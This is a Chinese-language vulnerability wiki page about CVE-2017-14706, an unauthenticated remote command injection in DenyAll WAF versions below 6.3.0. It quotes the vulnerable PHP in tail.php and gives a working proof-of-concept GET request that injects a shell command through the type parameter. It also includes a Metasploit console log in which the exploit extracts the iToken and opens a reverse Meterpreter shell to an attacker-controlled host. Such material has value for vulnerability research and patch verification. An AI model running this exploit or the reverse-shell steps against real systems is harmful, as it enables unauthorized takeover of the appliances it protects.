menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right DenyAll WAF chevron_right (CVE-2017-14706)DenyAll WAF _ 6.3.0 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2017-14706)DenyAll WAF _ 6.3.0 远程命令执行漏洞.md
    3.79 KB / 2021-04-21 09:23:46
        (CVE-2017-14706)DenyAll WAF \< 6.3.0 远程命令执行漏洞
    =======================================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    DenyAll WAF \< 6.3.0
    
    三、复现过程
    ------------
    
    ### 漏洞分析
    
    其实,DenyAll
    WAF中存在多处命令注入,其中一处为/webservices/stream/tail.php,以下是其中的一段代码:
    
        if(isset($_REQUEST['iToken'])){
          if($local->getIToken()!=$_REQUEST['iToken']){
            exitPrint(t_("Bad key, authentication on slave streaming server failed"));
          }
        }else{
          exitPrint(t_("Authentication on slave streaming server failed"));
        }
        if(isset($_REQUEST['tag']) && $_REQUEST['tag']!=''){
          // on doit chercher le bon fichier
          if(isset($_REQUEST['stime'])&&$_REQUEST['stime']!=''){ // Start time version
            tailDateFile();
          }else{ // dernier fichier ouvert
            if($_REQUEST['tag']=='tunnel') $_REQUEST['file']=basename(shell_run("ls -1t ".__RP_LOG__."*/".$_REQUEST['uid']."/*-".$_REQUEST['type'].".log| head -n1 2>/dev/null"));
            else $_REQUEST['file']=$_REQUEST['uid'].'-'.$_REQUEST['type'].'.log';
          }
        }
    
    在iToken可被泄露的情况下,这里又出现了另一个函数tailDateFile(),以下是其具体代码:
    
        function tailDateFile(){
          global $_REQUEST;
          $stime=(int)($_REQUEST['stime']/1000);
          $tag=$_REQUEST['tag'];
          $uid=$_REQUEST['uid'];
          $type=$_REQUEST['type']; // access or error
          chdir(__RP_LOG__);
          if($tag=='tunnel'){ // reverse proxy
            $files=shell_run("ls -1 */$uid/*-$type-*.log 2>/dev/null|sort")."\n"; // avec date trié au début
            $files.=shell_run("ls -1t */$uid/*-$type.log 2>/dev/null"); // courant trié par utilisation
          }else{
            $files=shell_run("ls -1 $uid-$type*-log 2>/dev/null|sort")."\n";
            $files.=shell_run("ls -1t $uid-$type.log 2>/dev/null");
          }
          // .. CODE OMITTED ..
        }
    
    从以上代码可以看到,\$uid参数可被控制,而且它还是shell\_run()函数变量的一部分。结合上述提及的这两方面问题,我们就能实现未授权命令注入漏洞。
    
    ### PoC
    
    通过HTTP请求触发远程RCE实现:
    
        GET /webservices/stream/tail.php?iToken=y760e0299ba6fc1a2739df5a8f64fc5a&tag=tunnel&stime=aaa&type=aaa$(sleep%2030") HTTP/1.1
        Host: www.0-sec.org:3001
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Cookie: connect.sid=s%3AWGBO5SaeECriIG8z4SMjwilZgl7SM0ej.0hGC0CcXrwnoJLb4YucLi8lbr%2FC8f2TNIicG4EmFLFU
        Connection: close
        Upgrade-Insecure-Requests: 1
    
    ### Metasploit反弹控制模块
    
    https://github.com/rapid7/metasploit-framework/pull/8980
    
        msf exploit(denyall_exec) > set RHOST 35.176.123.128
        RHOST => 35.176.123.128
        msf exploit(denyall_exec) > set LHOST 35.12.3.3
        LHOST => 35.12.3.3
        msf exploit(denyall_exec) > check
        [*] 35.176.123.128:3001 The target appears to be vulnerable.
        msf exploit(denyall_exec) > exploit
        [-] Handler failed to bind to 35.12.3.3:4444:-  -
        [*] Started reverse TCP handler on 0.0.0.0:4444
        [*] Extracting iToken value from unauthenticated accessible endpoint.
        [+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
        [*] Trigerring command injection vulnerability with  iToken value. 
        [*] Sending stage (40411 bytes) to 127.0.0.1  
        [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:60556) at 2017-09-19 14:31:52 +0300
         
        meterpreter > pwd
        /var/log/denyall/reverseproxy
        meterpreter > exit
        [*] Shutting down Meterpreter... 
        [*] 172.31.11.218 - Meterpreter session 1 closed.  Reason: User exit
        msf exploit(denyall_exec) > exit    
    
    
    links
    file_download